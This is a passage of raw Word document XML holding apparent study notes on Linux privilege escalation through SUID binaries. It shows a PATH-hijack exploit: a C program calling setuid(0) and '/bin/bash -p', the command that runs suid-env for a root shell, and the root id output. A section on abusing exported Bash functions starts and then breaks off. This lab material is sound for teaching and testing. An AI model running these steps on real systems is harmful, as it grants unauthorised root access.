      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002123">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="267"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-rwsr-sr-x 1 root staff 6883 May 14 2017 /usr/local/bin/suid-env</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002124">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="267"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">…</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002125">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="267"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The suid-env file should execute with root user permissions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002126">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="267"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run strings on the SUID file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002127">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="267"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">strings /usr/local/bin/suid-env </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002128">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="267"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002129">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="267"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">service apache2 start</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000212A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="267"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The file could be trying to run the service program without a full path</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000212B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="267"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can verify this with strace:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000212C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="267"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">strace -v -f -e execve /usr/local/bin/suid-env 2&gt;&amp;1 | grep service</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000212D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="267"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[pid 14395] execve("/bin/sh", ["sh", "-c", "service apache2 start"],</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000212E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="267"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">…</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000212F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="267"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Optionally, we can also verify with ltrace:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002130">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="267"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ltrace /usr/local/bin/suid-env 2&gt;&amp;1 | grep service</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002131">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="267"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">system("service apache2 start")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002132">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="267"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This reveals that the system function is being used to execute the service program.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002133">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="267"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Create a file service.c with the following contents</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002134">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">int main() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002135">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="720"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">setuid(0);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002136">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="720"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">system("/bin/bash -p");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002137">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pP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2138">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="267"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Compile service.c into a file called service</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002139">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="267"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gcc -o service service.c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000213A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="267"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Prepend the current directory (or where the new service executable is located) to the PATH variable, and execute the SUID file for a root shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000213B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="267"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PATH=.:$PATH /usr/local/bin/suid-env</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000213C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="267"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root@debian:~# id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000213D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="267"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">uid=0(root) gid=0(root) groups=0(root) …</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000213E">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000213F">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002140">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_jf08wu3pgnkc" w:id="289"/>
      <w:bookmarkEnd w:id="289"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Abusing Shell Features (#1)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002141">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From Tib3rius SUID Video</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002142">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002143">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002144">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Old Shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002145">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="309"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In some shells (notably Bash &lt;4.2-048) it is possible to define user functions with an absolute path name.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002146">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="309"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">These functions can be exported so that subprocesses have access to them, and the functions can take precedence over the actual executable being called</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002147">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002148">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to exploit:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002149">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="108"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Find SUID/SGID files on the target</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000214A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="108"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$ find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2&gt; /dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000214B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="108"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000214C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="108"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-rwsr-sr-x 1 root staff 6883 May 14 2017 /usr/local/bin/suid-env2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000214D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="108"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">…</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000214E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="108"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The suid-env2 file should execute with root user permissions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000214F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="108"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run strings on the SUID file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002150">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="108"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$ strings /usr/local/bin/suid-env2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002151">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="108"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002152">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="108"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">service apache2 start</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002153">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="108"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The file could be trying to run the /usr/sbin/service program</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002154">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="108"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can verify this with strace:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002155">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="108"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
